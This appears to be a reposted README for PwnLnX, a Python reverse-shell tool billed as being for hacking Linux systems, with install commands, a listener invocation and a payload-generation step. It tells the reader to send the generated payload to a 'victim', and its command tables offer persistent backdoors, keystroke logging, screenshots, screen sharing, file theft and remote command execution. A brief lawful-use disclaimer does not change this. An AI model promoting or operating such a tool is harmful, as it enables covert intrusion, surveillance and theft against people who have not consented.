PwnLnX is an advanced multi-threaded, multi-client python reverse shell for hacking Linux systems. There’s still more work to do so feel free to help out with the development. Disclaimer: This reverse shell should only be used in the lawful, remote administration of authorized systems. Accessing a computer network without authorization or permission is illegal.
Getting Started
Please follow these instructions to get a copy of PwnLnX running on your local machine without any problems.
Prerequisites
- Python3:
- vidstream
- pyfiglet
- tqdm
- mss
- termcolor
- pyautogui
- pyinstaller
- pip3
- pynput
Installing
Download source code
git clone https://github.com/spectertraww/PwnLnX.git
cd Pwn LnX
download and install dependences
chmod +x setup.sh
./setup.sh
Getting PwnLnx up and running
- Show help
python3 PwnLnX.py –help
- Listening for incoming connections
python3 PwnLnX.py –lhost [your localhost ip address] –lport [free port for listening incoming connections]
- Creating/Generating a payload
chmod +x PwnGen.sh
./PwnGen.sh
- Then follow the procedure to successfully create your payload, the payload is saved in PwnLnx directory. Send the created payload to victim.
PwnLnx Usage
Command | Usage |
---|---|
help | show help |
exit | close all the sessions and quit the progaram. |
show sessions | show all available sessions from connected. |
session [ID] | interact with a specified session ID. |
kill [all/ID] | kill a specified session or all to kill all sessions. |
banner | have funny by changing the program banner |
Interact With A Session
Command | Usage |
---|---|
help | show help. |
quit | close the current session. |
background | background the current session. |
sysinfo | get minimum target system information. |
create_persist | create a persistant backdoor. |
upload | upload the specified filename to the target system. |
download | download the specified filename from the target system. |
screenshot | take a desktop screenshot of the target system. |
start_screenshare | start desktop screensharing. |
stop_screenshare | stop desktop screensharing. |
start_keycap | start capturing victim’s pressed keystrokes. |
dump_keycap | dump/get the captured keystrokes. |
stop_keycap | stop the capturing keystrokes. |
NB. you can also execute linux system commands besides those listed above.
Snapshots
![](https://1.bp.blogspot.com/-yE_8vmw6vx4/YJUXAgRIdzI/AAAAAAAAI_o/n9YCI7gwc28YYmV6Ve947r8kLsISPscQgCLcBGAsYHQ/s1366/start_con1.png)
![](https://1.bp.blogspot.com/-dDzrFzAjvfE/YJUXXXvTmsI/AAAAAAAAI_w/QZg_mi8QxsMPppZPR99LuM0CnFhFXv83ACLcBGAsYHQ/s1366/2.png)
![](https://1.bp.blogspot.com/-Jd_JjkBNoWk/YJUXugxwpzI/AAAAAAAAI_4/uEtUDrfC50kuknBiBqF-mkapxyUiVt22gCLcBGAsYHQ/s1366/3.png)
![](https://1.bp.blogspot.com/-etEIJF2jqvI/YJUYMTljj1I/AAAAAAAAJAA/N7q_gwGDYqUfWflZVWQ58jt0Lmf0fmkIwCLcBGAsYHQ/s1366/4.png)
![](https://1.bp.blogspot.com/-B0gj3jQtTCo/YJUYjNizYvI/AAAAAAAAJAI/3wcdSSAAu0UkyOY3dQoVrd8P2JxoixYWwCLcBGAsYHQ/s1366/5.png)
![](https://1.bp.blogspot.com/-Tw9Kdwihxus/YJUY4T-H_II/AAAAAAAAJAQ/qGmmpE1PpZcUY2Dk45SNoTh_4GeCX1SawCLcBGAsYHQ/s1344/6.png)
![](https://1.bp.blogspot.com/-32Zafc9Yjvc/YJUZNKdl8sI/AAAAAAAAJAY/NT37dBU7vUIaYWq7mkTW4Wtg7O9EIP8pgCLcBGAsYHQ/s1355/7.png)
![](https://1.bp.blogspot.com/-0bnLDYyaDKw/YJUZnlEp0lI/AAAAAAAAJAg/C-eA2BC4z6gNbP7Xs4cUsRLebrcL4huKgCLcBGAsYHQ/s1361/8.png)
![](https://1.bp.blogspot.com/-tqjlCaTy96Y/YJUaAXqaJ6I/AAAAAAAAJAo/prb7uwCMLoMh4-7yjF5xGw5dkgqZtsIywCLcBGAsYHQ/s1366/9.png)